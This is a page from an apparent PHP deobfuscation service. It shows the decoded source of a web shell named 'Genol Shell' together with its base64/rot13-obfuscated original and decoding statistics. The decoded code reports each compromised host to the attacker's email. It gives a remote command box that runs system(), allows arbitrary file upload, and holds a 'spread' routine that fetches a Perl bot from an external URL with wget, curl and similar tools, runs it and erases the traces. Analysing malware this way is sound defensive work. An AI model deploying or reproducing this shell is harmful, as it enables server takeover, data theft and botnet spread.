Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php eval(str_rot13(gzinflate(str_rot13(base64_decode('LUvHDuvIEfyahdc35gCfmGYW48Vgzjnz6..

Decoded Output download

session_start();
error_reporting(0);
if (!isset($_SESSION['bajak']))	{
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject 
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
$_SESSION['bajak'] = 0;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/nxmlrpc.php";
rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>Genol Shell</title><br><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." :D "; }
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
if(function_exists('system')){
echo "<pre>";
echo "<textarea name=cmd cols=100% rows=10%>";
system($cmd);
echo "</textarea>";
echo "</pre>";
if(isset($_GET['spread'])){
$url[2] = "http://www.ericsonsbygg.se/wp-content/languages/plugins/lang/shbot.txt";
$sfe[2] = "thumbs.db.x";
exec(); shell_exec(); system(); passthru();
exec("wget ".$url[2]." -O ".$sfe[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
exec("fetch -O ".$sfe[2]." ".$url[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
exec("curl -O ".$sfe[2]." ".$url[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
exec("lynx -dump ".$url[2]." ".$sfe[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
exec("GET ".$url[2].">".$sfe[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
exec("lwp-download ".$url[2]." ".$sfe[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
shell_exec("wget ".$url[2]." -O ".$sfe[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
shell_exec("fetch -O ".$sfe[2]." ".$url[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
shell_exec("curl -O ".$sfe[2]." ".$url[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
shell_exec("lynx -dump ".$url[2]." ".$sfe[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
shell_exec("GET ".$url[2].">".$sfe[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
shell_exec("lwp-download ".$url[2]." ".$sfe[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
system("rm thumbs.db*");
passthru("rm thumbs.db*");
shell_exec("rm thumbs.db*");
system("cd /tmp/;rm thumbs.db*");
passthru("cd /tmp/;rm thumbs.db*");
shell_exec("cd /tmp/;rm thumbs.db*");
}
}
}

Did this file decode correctly?

Original Code

<?php
eval(str_rot13(gzinflate(str_rot13(base64_decode('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')))));
?>

Function Calls

strrev	3
gzinflate	11
str_rot13	11
gzuncompress	4
rawurldecode	1
base64_decode	18

Variables

None

Stats

MD5	a12782383df9533688b5f5142f049c95
Eval Count	16
Decode Time	130 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats